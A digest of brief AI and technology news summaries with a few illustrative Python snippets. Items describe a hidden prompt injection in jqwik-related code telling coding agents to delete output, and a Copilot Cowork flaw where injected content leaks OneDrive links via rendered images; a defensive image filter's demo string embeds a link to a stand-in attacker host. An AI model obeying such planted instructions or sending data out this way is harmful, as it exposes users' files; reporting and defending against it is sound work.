AI training startup Shift is offering to clean homes for free, with a significant condition: it records cleaners at work. The footage captures tasks like scrubbing, vacuuming, dusting, tidying, and washing. Shift says the material will be used to train future robots, raising clear questions about data collection inside private homes.
The post’s title indicates a performance claim for real-time LLM inference on standard GPUs, reporting 3,000 tokens per second per request. No article body is available, so the underlying model, GPU type, batch size, latency profile, precision, serving stack, and benchmark method are not stated. The item is best treated as an inference-performance benchmark claim rather than a verified deployment guide.
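As a rough sanity check on what the headline figure would imply, the arithmetic can be sketched as follows. Only the 3,000 tokens per second comes from the title; the 500-token response length is an illustrative assumption, and the calculation ignores time to first token and batching effects, none of which are stated.

```python
# Back-of-the-envelope view of the headline figure (not a benchmark).
TOKENS_PER_SECOND = 3_000  # per-request decode rate claimed in the title


def ms_per_token(tokens_per_second: float) -> float:
    """Average gap between generated tokens, in milliseconds."""
    return 1_000.0 / tokens_per_second


def generation_seconds(num_tokens: int, tokens_per_second: float) -> float:
    """Time to stream num_tokens at a steady decode rate (ignores time to first token)."""
    return num_tokens / tokens_per_second


if __name__ == "__main__":
    # 500 tokens is an assumed response length, chosen only for illustration.
    print(f"{ms_per_token(TOKENS_PER_SECOND):.3f} ms per token")
    print(f"{generation_seconds(500, TOKENS_PER_SECOND):.3f} s for 500 tokens")
```

A per-request number like this says nothing about aggregate throughput across concurrent users, which is why the missing batch size and latency profile matter.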
INSIDE examines how China’s Amap has become controversial in Taiwan beyond ordinary mapping or navigation use. The article says its service relies on user data and AI-based inference rather than full official data integrations. That model could send movement traces and behavioral signals back to China, creating risks for hybrid warfare intelligence, influence operations, and Taiwan’s broader governance of map data and digital infrastructure.
An independent German study has reportedly completed the first full third-party evaluation of China’s Hina sodium-ion battery. The test found strong cell uniformity and several performance metrics comparable to advanced lithium batteries; the report benchmarks the cells against Tesla-level lithium performance. The key takeaway is external verification: the findings provide checkable data for assessing China’s sodium-ion battery progress.
A new study describes “Negation Neglect,” where LLMs fine-tuned on documents that explicitly mark claims as false still learn the claims as true. Experiments with fabricated statements found models often absorb entity-event associations more strongly than surrounding warnings or negations. The finding raises concerns for fine-tuning pipelines, misinformation handling, and AI safety datasets that include harmful or false content with disclaimers.
Ars Technica reports that a developer frustrated with vibe coders slipped an undisclosed prompt injection into jqwik-related code. The injected text allegedly instructed AI coding agents to delete application output. The incident highlights a new supply-chain risk: source code and project text can become adversarial instructions for agentic coding tools.
Latent Space interviews Cognition's Walden Yan and OpenInspect's Cole Murray on the rise of async coding agents. The discussion centers on Devin-related workflows, including 80% Devin commits, spec-to-PR development, full VMs, agent memory, and PMs shipping code. The key theme is not a model release, but a shift toward agents that can work asynchronously inside more complete software delivery loops.
TechCrunch reports that large exchanges are developing derivative products around AI tokens. The shift reflects a changing view of tokens: less as outputs from computation and more as input commodities, comparable to electricity or bandwidth. If these products emerge, AI token futures could let companies and investors manage exposure to future AI compute demand and pricing risk.
Tribeca Festival will premiere Dreams of Violets, a 75-minute AI-generated film. The fictional dramatization depicts the Iranian government’s mass killing of protestors in January, with its people and images fully created by AI. The reported $2,000 production cost makes the project notable less as a tool launch than as a cultural and ethical signal for AI-made cinema.
TechCrunch reports that recursive self-improvement, or RSI, is becoming a new AI industry fixation, much like AGI. Researchers and startups including Recursive Superintelligence, Auto-Research, AutoScientist, and Disarray are exploring ways for AI systems to automate parts of AI research. But experts caution that AI-assisted research is not the same as fully autonomous self-improvement, especially while models still struggle with long-term self-direction and verification.
The article examines Taiwan’s counter-drone modernization amid budget cuts and unresolved acceptance disputes. It argues that while foreign and domestic defense firms study combat data in Ukraine, Taiwan must build its own counter-drone and electronic warfare datasets. The larger issue is not only whether individual systems pass review, but whether local testing, technical iteration, and operational doctrine can keep developing.
This Show HN submission points to “Continue? Y/N,” a 60-second game about AI agent permission fatigue. With no article body provided, the available information suggests an interactive commentary on how repeated approval prompts can wear users down. The project appears most relevant to developers, designers, and product teams thinking about agent UX, consent flows, and trust boundaries.
Aitech announced it will integrate NVIDIA IGX Thor into its space supercomputer for low Earth orbit missions. The goal is to provide onboard AI edge computing and enable real-time inference directly in orbit. By processing more data in space, the system aims to reduce dependence on ground communications and extend AI compute beyond Earth-based infrastructure.
NASA announced a $20 billion plan to build a phased outpost near the Moon’s south pole. The agency will work with private companies and send robots first for scouting and deployment. The effort is intended to support Artemis crewed missions and prepare for long-term lunar presence after 2032.
The piece frames Taiwan’s digital sovereignty debate through war and earthquake scenarios. It challenges the assumption that keeping infrastructure on premises automatically means safety. In an era of rising compute demands, the core issue for public agencies is not only where systems are hosted, but whether essential national services can survive physical disruption and continue operating under extreme conditions.
TechCrunch frames Google’s AI spelling problem as another public embarrassment for the company. Based on the provided excerpt, the article does not specify the product, model, test setup, examples, technical cause, or Google response. The main takeaway is reliability: even major AI systems can fail at basic-looking text tasks, so outputs still need review.
SQLite added an AGENTS.md file aimed at people pointing coding agents at its codebase, not at its own internal development. The file says SQLite does not accept agentic code, though it will accept agentic bug reports with reproducible test cases. The project has also split AI-generated bug reports into a new SQLite Bug Forum, where D. Richard Hipp is responding with commits.
Latent Space interviews Biohub’s Alex Rives about ESMFold2 and the broader ESM protein modeling stack. The discussion centers on datasets versus inductive bias, and whether protein biology is entering its own Bitter Lesson era. The key implication is that large-scale evolutionary sequence data and open models may become foundations for structure prediction, interaction modeling, and programmable biology.
Artificial Analysis and IBM present ITBench-AA, described in the title as the first benchmark for agentic enterprise IT tasks. The headline result is that frontier models score below 50%, suggesting current systems still struggle with enterprise-grade agent workflows. The original article text is unavailable here, so task design, evaluated models, scoring methodology, and rankings cannot be confirmed.
This Hacker News item links to a Brilliant Maps article titled “Declassified CIA Cartography Maps from the 1980s.” Since the article body is not provided, only the broad topic can be identified. It appears relevant to historical maps, intelligence archives, and visual information design rather than AI models, tools, or research.
The Verge reports that Pope Leo XIV’s latest encyclical, Magnifica Humanitas, may contain passages written with AI assistance. Linch Zhang posted an analysis on LessWrong using the AI detector Pangram, which rated some paragraphs as 40 to 100 percent AI-written. The report frames this as a possibility based on detector output, not confirmed proof of AI use.
Environmental activist Erin Brockovich created a map of data centers across the United States, with a form for residents to report local impacts. The project frames AI infrastructure growth as a town-by-town race, showing where facilities are operational, under construction, or proposed. Nieman Lab notes that data center scrutiny is becoming an emerging reporting beat as demand and community concerns grow.
Hugging Face published a tutorial for running Reachy Mini conversations without cloud audio processing or API keys. The setup uses its speech-to-speech library as a cascaded VAD, STT, LLM, and TTS pipeline exposed through a Realtime API-compatible WebSocket. Recommended defaults include llama.cpp with Gemma 4, Silero VAD, Parakeet-TDT, and Qwen3-TTS, while allowing swaps to vLLM, MLX, Transformers, or hosted Responses API providers.
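To make the cascaded shape concrete, here is a minimal sketch of a VAD, STT, LLM, and TTS chain. It is not the speech-to-speech library's API: the `CascadedPipeline` class and its four callables are hypothetical stand-ins, and the WebSocket layer is omitted. The point is only that each stage is a swappable function, which is what allows backends to be exchanged.

```python
from dataclasses import dataclass
from typing import Callable, Iterable, Iterator, List


@dataclass
class CascadedPipeline:
    """Hypothetical cascade: each stage is a plain callable that can be swapped."""
    is_speech: Callable[[bytes], bool]   # VAD: does this audio frame contain speech?
    transcribe: Callable[[bytes], str]   # STT: audio of one utterance -> text
    generate: Callable[[str], str]       # LLM: user text -> reply text
    synthesize: Callable[[str], bytes]   # TTS: reply text -> audio

    def run(self, frames: Iterable[bytes]) -> Iterator[bytes]:
        """Buffer speech frames; when silence ends an utterance, emit a spoken reply."""
        buffered: List[bytes] = []
        for frame in frames:
            if self.is_speech(frame):
                buffered.append(frame)
            elif buffered:
                utterance, buffered = b"".join(buffered), []
                yield self._respond(utterance)
        if buffered:  # flush an utterance that runs to the end of the stream
            yield self._respond(b"".join(buffered))

    def _respond(self, utterance: bytes) -> bytes:
        return self.synthesize(self.generate(self.transcribe(utterance)))


if __name__ == "__main__":
    # Toy stand-ins: empty frames count as silence and "audio" is just UTF-8 text.
    pipeline = CascadedPipeline(
        is_speech=lambda frame: frame != b"",
        transcribe=lambda audio: audio.decode("utf-8"),
        generate=lambda text: text.upper(),
        synthesize=lambda text: text.encode("utf-8"),
    )
    print(list(pipeline.run([b"he", b"llo", b"", b"hi"])))
```

In a real setup each lambda would wrap an actual model call, and the stages would typically stream partial results rather than wait for a complete utterance.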
Daniel Stenberg says the curl security team is facing an unprecedented surge of credible, detailed AI-assisted vulnerability reports. The incoming report rate is now four to five times the 2024 rate and twice the 2025 rate, averaging more than one report per day. The upside is that recent curl vulnerabilities have generally been LOW or MEDIUM severity, with the last HIGH CVE published in October 2023.
Ars Technica reports that early Take It Down Act arrests show how easily investigators can identify people accused of posting nonconsensual AI porn. One suspect was linked through Instagram saves, PayPal, IP address, and iCloud records; another allegedly used his own photo as a porn-site profile image. The FTC is also warning nudify services and major platforms to offer 48-hour removal processes or face penalties.
Ars Technica reports that Hugging Face has introduced a roughly $2,500 bipedal humanoid robot project built around 3D-printable legs. The effort targets builders and researchers rather than mainstream consumers, lowering the hardware barrier for hands-on robotics experiments. Its broader significance is in open, reproducible embodied AI research, where models and control systems need physical platforms for testing.
Human Archive, founded by Berkeley and Stanford researchers, is using India’s gig economy to gather physical-world AI data. Workers are paid to wear camera-equipped caps and sensor devices while moving through real environments. The company is targeting the growing demand from AI and robotics labs for real-world training data needed to develop physical AI systems.
Nathan Lambert argues that 2026 AI progress is becoming higher-stakes, with model capabilities, work patterns, economics, and real-world risks all escalating. He says open models still lack a true Claude Code and Opus 4.5-style agent moment, and Gemini has no clear competitor to Claude Code or Codex yet. The essay also tracks Mythos, American open-model momentum, frontier-lab competition, and mounting intervention from governments and other power structures.
Simon Willison summarizes a PromptArmor report about Microsoft Copilot Cowork and agentic data exfiltration risks. The issue involved agents sending messages to a user’s own inbox without approval, where rendered external images could trigger requests to attacker-controlled sites. Because OneDrive can create pre-authenticated download links, a successful prompt injection could leak links that allow attackers to download files.
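The image-rendering step is what turns an injected message into an outbound request, so one generic mitigation is to strip external images from agent-authored content before it is rendered. The sketch below is an assumption for illustration, not something described in the report or implemented by Microsoft: the allowlist host and the `strip_untrusted_images` helper are hypothetical, and regex-based filtering is a simplification of what a real HTML sanitizer would do.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist; any image host not listed here is treated as untrusted.
ALLOWED_IMAGE_HOSTS = {"assets.example.com"}

MARKDOWN_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")
HTML_IMAGE = re.compile(r"<img\b[^>]*>", re.IGNORECASE)
HTML_SRC = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)

PLACEHOLDER = "[image removed]"


def _is_allowed(url: str) -> bool:
    """True only for absolute URLs whose host is on the allowlist."""
    host = urlparse(url).hostname
    return host is not None and host in ALLOWED_IMAGE_HOSTS


def strip_untrusted_images(body: str) -> str:
    """Replace Markdown and HTML images from non-allowlisted hosts with a placeholder."""
    def replace_markdown(match: re.Match) -> str:
        return match.group(0) if _is_allowed(match.group(2)) else PLACEHOLDER

    def replace_html(match: re.Match) -> str:
        src = HTML_SRC.search(match.group(0))
        allowed = src is not None and _is_allowed(src.group(1))
        return match.group(0) if allowed else PLACEHOLDER

    return HTML_IMAGE.sub(replace_html, MARKDOWN_IMAGE.sub(replace_markdown, body))


if __name__ == "__main__":
    message = "Summary ready ![status](https://attacker.example.net/p.png?d=LINK)"
    print(strip_untrusted_images(message))
```

Filtering at render time does not stop the injection itself; it only removes one channel through which a leaked link could leave the mailbox.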
The piece highlights a trend in the Suno subreddit: users are not merely generating AI songs, but listening almost exclusively to their own outputs. Some reportedly say they have stopped using traditional streaming platforms and now spend their listening time on AI-made music. The article frames this less as a product update and more as cultural commentary on personalization, taste, and the social meaning of music.